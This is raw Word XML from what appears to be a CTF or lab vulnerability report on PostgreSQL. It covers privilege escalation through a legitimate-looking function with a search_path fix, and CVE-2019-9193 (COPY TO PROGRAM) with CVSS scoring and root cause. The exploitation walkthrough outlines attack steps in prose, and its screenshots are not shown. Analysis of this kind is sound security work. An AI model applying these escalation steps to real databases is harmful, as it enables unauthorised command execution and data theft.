    <w:p w:rsidR="00793B0C" w:rsidRDefault="00793B0C" w:rsidP="00793B0C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An attacker successfully exploiting this vulnerability can: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793B0C" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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</w:tr>
      <w:tr w:rsidR="00793B0C" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Credential Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Get users information </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793B0C" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Financial Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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If the database attacked has financial information </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793B0C" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Privilege escalation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Escalate the attacker privileges and have access on anything in the database </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793B0C" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00793B0C" w:rsidRPr="007E1FD9" w:rsidRDefault="00793B0C" w:rsidP="0031438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Access the flag and all sensitive database records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A52DFA" w:rsidRDefault="00A52DFA" w:rsidP="00793B0C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00793B0C" w:rsidRPr="009731C2" w:rsidRDefault="00793B0C" w:rsidP="00793B0C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9731C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1.6 Exploitation Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793B0C" w:rsidRPr="00A52DFA" w:rsidRDefault="001C1C06" w:rsidP="00793B0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Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="00793B0C" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker would do a payload (function that looks legitimate) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793B0C" w:rsidRPr="00A52DFA" w:rsidRDefault="00793B0C" w:rsidP="00793B0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52DF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3526FE5" wp14:editId="2C9B5C64">
            <wp:extent cx="5264421" cy="2197213"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="793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B0C" w:rsidRPr="00A52DFA" w:rsidRDefault="001C1C06" w:rsidP="00793B0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Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="0028684C" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00793B0C" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nside that function he will call/execute a payload</w:t>
      </w:r>
      <w:r w:rsidR="00793B0C" w:rsidRPr="00A52DF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793B0C" w:rsidRPr="00A52DFA" w:rsidRDefault="00793B0C" w:rsidP="00793B0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In our case he </w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">used it to privilege escalate to be a superuser </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7ECC" w:rsidRPr="00A52DFA" w:rsidRDefault="005A7ECC" w:rsidP="00793B0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52DFA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698614C" wp14:editId="0ED96A1E">
            <wp:extent cx="4400776" cy="2444876"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="171019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92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A9A" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C0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Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="0028684C" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">og in normally and call the function </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7ECC" w:rsidRPr="00A52DFA" w:rsidRDefault="005A7EC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52DF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AF9B5B4" wp14:editId="58BCC29C">
            <wp:extent cx="3168813" cy="857294"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145341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8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ECC" w:rsidRPr="00A52DFA" w:rsidRDefault="001C1C0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Step 4:</w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="00A52DF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A7ECC" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Calling the function</w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="00A52DF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5A7ECC" w:rsidRPr="00A52DFA" w:rsidRDefault="005A7EC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52DF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4D02C0A" wp14:editId="413625BE">
            <wp:extent cx="3619686" cy="330217"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148821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14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ECC" w:rsidRPr="00A52DFA" w:rsidRDefault="001C1C0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Step 5: </w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Finally, he became a superuser plus got the flag</w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="00A52DF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5A7ECC" w:rsidRDefault="005A7EC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A7ECC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02155262" wp14:editId="070625D0">
            <wp:extent cx="4026107" cy="2749691"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="387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C2" w:rsidRPr="009731C2" w:rsidRDefault="005A7ECC" w:rsidP="001C1C0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A7ECC"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7905A2F2" wp14:editId="6849114D">
            <wp:extent cx="5816899" cy="787440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101611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14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C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7ECC" w:rsidRPr="009731C2" w:rsidRDefault="009731C2" w:rsidP="009731C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1.7 </w:t>
      </w:r>
      <w:r w:rsidR="005A7ECC" w:rsidRPr="009731C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Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7ECC" w:rsidRPr="009731C2" w:rsidRDefault="005A7ECC" w:rsidP="005A7ECC">
      <w:pPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009731C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Would be putting a </w:t>
      </w:r>
      <w:r w:rsidRPr="009731C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>search path= (pg_catalog, pg_temp)</w:t>
      </w:r>
      <w:r w:rsidRPr="009731C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3F98" w:rsidRPr="009731C2" w:rsidRDefault="005A7ECC" w:rsidP="007D3F98">
      <w:pPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009731C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">So, Postgres always searches from the safe already defined functions  </w:t>
      </w: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Default="007D3F98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27619E" w:rsidRDefault="0027619E" w:rsidP="007D3F9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7D3F98" w:rsidRPr="00A52DFA" w:rsidRDefault="007D3F98" w:rsidP="00A52DFA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 w:rsidRPr="00A52DFA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lastRenderedPageBreak/>
        <w:t>Vulnerability 2: PostgreSQL Privilege Escalation via COPY TO PROGRAM (CVE-2019-9193)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpXSpec="center" w:tblpY="467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685"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C4102" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="006C4102">
            <w:pPr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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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Network (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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Accessible via database connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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Low (L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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Requires only SQL execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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Low (L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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Attacker already has DB user access</w:t>
            </w:r>
            <w:r w:rsidR="00EA487F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (MISCONFIG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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No user interaction required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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Changed (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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DB compromise leads to OS command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="418"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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Access to sensitive files (/flag.txt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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Can modify filesystem contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3F98" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="002761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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98" w:rsidP="007D3F9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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D3F98" w:rsidRPr="006C4102" w:rsidRDefault="007D3F98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</w:rPr>
              <w:t>Can execute system-level commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007D3F98" w:rsidRPr="00A600DE" w:rsidRDefault="0027619E" w:rsidP="007D3F98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2.1</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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Base Score: </w:t>
      </w:r>
      <w:r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9.9</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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(</w:t>
      </w:r>
      <w:r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CRITICAL</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A600DE" w:rsidRDefault="00A600DE" w:rsidP="00A600DE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A600DE" w:rsidRPr="00A600DE" w:rsidRDefault="00A600DE" w:rsidP="00A600DE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r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2</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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.</w:t>
      </w:r>
      <w:r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2</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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Root Cause Analysis</w:t>
      </w:r>
      <w:r w:rsidR="007D3F98" w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52DFA" w:rsidRDefault="007D3F98" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable Configuration</w:t>
      </w:r>
      <w:r w:rsidR="00A600DE" w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> File</w:t>
      </w:r>
      <w:r w:rsidRPr="00A600DE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A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A600DE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A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A52DFA" w:rsidRDefault="007D3F98" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The vulnerability is caused by excessive PostgreSQL privileges granted to the attacker account</w:t>
      </w:r>
      <w:r w:rsidR="00A600DE" w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Misconfiguration)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52DFA" w:rsidRDefault="00EA487F" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE65E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A8293A7" wp14:editId="5E674E19">
            <wp:extent cx="4004733" cy="1583518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11585479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199" cy="159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19E" w:rsidRPr="00A52DFA" w:rsidRDefault="0027619E" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276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r w:rsidR="00EA487F" w:rsidRPr="00276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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00276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vulnerabl</w:t>
      </w:r>
      <w:r w:rsidR="00EA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e?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027619E" w:rsidRPr="00EA487F" w:rsidRDefault="0027619E" w:rsidP="00EA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0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role </w:t>
      </w:r>
      <w:r w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002060"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A600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enables execution of OS-level programs</w:t>
      </w:r>
      <w:r w:rsidR="00A600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EA487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Thus, a</w:t>
      </w:r>
      <w:r w:rsidR="00EA487F" w:rsidRPr="00A600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low-privileged user </w:t>
      </w:r>
      <w:r w:rsidR="00EA487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 execute system-level functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="009731C2" w:rsidP="007D3F98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7D3F98" w:rsidRPr="00A600DE" w:rsidRDefault="00A600DE" w:rsidP="007D3F98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lastRenderedPageBreak/>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidR="007D3F9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The Injection </w:t>
      </w:r>
      <w:r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Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027619E" w:rsidRDefault="0027619E" w:rsidP="0027619E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
